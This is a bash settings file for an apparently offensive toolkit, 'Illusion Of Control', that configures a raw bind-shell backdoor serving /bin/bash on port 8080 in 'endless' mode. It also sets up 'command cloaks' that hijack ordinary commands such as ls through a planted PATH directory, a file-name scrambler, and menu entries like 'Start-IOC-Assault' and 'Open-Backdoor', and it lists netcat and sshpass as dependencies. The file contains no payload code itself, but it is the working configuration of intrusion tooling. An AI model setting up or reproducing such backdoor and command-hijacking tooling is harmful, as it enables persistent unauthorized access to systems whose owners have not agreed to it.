#
# Regards, the Alveare Solutions society.
#
# Illusion Of Control Settings

IOC_SCRIPT_NAME='(I.O).Control'
IOC_PS3='IllusionOfControl> '
IOC_VERSION='Cloak&Dagger'
IOC_VERSION_NO='1.1'
IOC_SAFETY='off' #(on | off)

# [ NOTE ]: IOC_DEFAULT contains values that override Machine Dialogue defaults.
IOC_DEFAULT=(
['log-dir']="$IOC_DIRECTORY/logs"
['conf-dir']="$IOC_DIRECTORY/conf"
['lib-dir']="$IOC_DIRECTORY/lib"
['src-dir']="$IOC_DIRECTORY/src"
['dox-dir']="$IOC_DIRECTORY/dox"
['dgr-dir']="$IOC_DIRECTORY/daggers"
['clk-dir']="$IOC_DIRECTORY/cloaks"
['dmp-dir']="$IOC_DIRECTORY/dump"
['tmp-dir']="/tmp"
['log-file']="$IOC_DIRECTORY/logs/illusion-of-control.log"
['conf-file']="$IOC_DIRECTORY/conf/illusion-of-control.conf"
['cmd-file']="$IOC_DIRECTORY/dump/command-cloaks.ioc"
['tmp-file']="$IOC_DIRECTORY/tmp/ioc.tmp"
['dgr-file']="$IOC_DIRECTORY/daggers/ls.dgr"
['log-lines']=100
['cloak-order']='pre-exec'
['path-dir']='/.uzr/bin'
['target']='local'
['conn-type']='raw'
['conn-details']="@127.0.0.1:8080"
['conn-timeout']=5
['setup-path']='off'
['force-cmd']='on'
['file-editor']="${EDITOR:-vim}"
['command']='ls'
['rbd-port']=8080
['rbd-mode']='endless'
['rbd-cnx']=17
['rbd-foreground']='on'
['rbd-shell']='/bin/bash'
['rbd-verbosity']=3
['sudo-flag']='on'
)

IOC_IMPORTS=(
['command-file']=''
)

# Illusion Of Control Libraries

IOC_LIB=(
['machine-dialogue']="${IOC_DEFAULT['lib-dir']}/MachineDialogue/machine-dialogue"
)

# Illusion Of Control Scripts

IOC_SOURCE=(
['display']="${IOC_DEFAULT['src-dir']}/ioc-display.sh"
['setup']="${IOC_DEFAULT['src-dir']}/ioc-setup.sh"
['creators']="${IOC_DEFAULT['src-dir']}/ioc-creators.sh"
['actions']="${IOC_DEFAULT['src-dir']}/ioc-actions.sh"
['setters']="${IOC_DEFAULT['src-dir']}/ioc-setters.sh"
['fetchers']="${IOC_DEFAULT['src-dir']}/ioc-fetchers.sh"
['checkers']="${IOC_DEFAULT['src-dir']}/ioc-checkers.sh"
['formatters']="${IOC_DEFAULT['src-dir']}/ioc-formatters.sh"
)

IOC_CARGO=(
['illusion-of-control']="${IOC_DEFAULT['src-dir']}/illusion-of-control.sh"
['raw-backdoor']="${IOC_DEFAULT['src-dir']}/raw-backdoor.sh"
['file-name-scrambler']="${IOC_DEFAULT['src-dir']}/file-name-scrambler.sh"
['ssh-command']="${IOC_DEFAULT['src-dir']}/ssh-command.exp"
)

# (I.O).Control Controllers

MAIN_CONTROLLER_LABEL='MainController'
MAIN_CONTROLLER_DESCRIPTION='Control Is An Illusion'
MAIN_CONTROLLER_OPTIONS='
(I.O).Control,
Log-Viewer,
Control-Panel,
Back'

CLOAK_AND_DAGGER_CONTROLLER_LABEL='CloakAndDagger'
CLOAK_AND_DAGGER_CONTROLLER_DESCRIPTION="Cloak && Dagger"
CLOAK_AND_DAGGER_CONTROLLER_OPTIONS='
Start-IOC-Assault,
Interactive-Session,
Open-Backdoor,
IOC-Help,
Back'

LOGVIEWER_CONTROLLER_LABEL='LogViewer'
LOGVIEWER_CONTROLLER_DESCRIPTION="Log Viewer"
LOGVIEWER_CONTROLLER_OPTIONS='
Display-Tail,
Display-Head,
Display-More,
Clear-Log,
Back'

SETTINGS_CONTROLLER_LABEL='ControlPanel'
SETTINGS_CONTROLLER_DESCRIPTION="Control Panel"
SETTINGS_CONTROLLER_OPTIONS="
Set-Safety-ON,
Set-Safety-OFF,
Set-SUDO-Flag,
Set-Temporary-File,
Set-Log-File,
Set-Log-Lines,
Set-File-Editor,
Set-Command,
Set-Target,
Set-Dagger-File,
Set-Connection-Type,
Set-Connection-Details,
Set-PATH-Setup,
Set-Connection-Timeout,
Set-Order,
Set-PATH,
Import-CMD-Cloaks,
Edit-CMD-Cloaks,
Install-Dependencies,
Back"

# Illusion Of Control Logging Levels

IOC_LOGGING_LEVELS=(
'INFO'
'Q/A'
'OK'
'NOK'
'DONE'
'ERROR'
'WARNING'
'SYMBOL'
'DEBUG'
)

# Illusion Of Control Dependencies

IOC_APT_DEPENDENCIES=(
'ncat'
'nc'
'find'
'test'
'chmod'
'chown'
'mkdir'
'touch'
'ssh'
'sshpass'
)
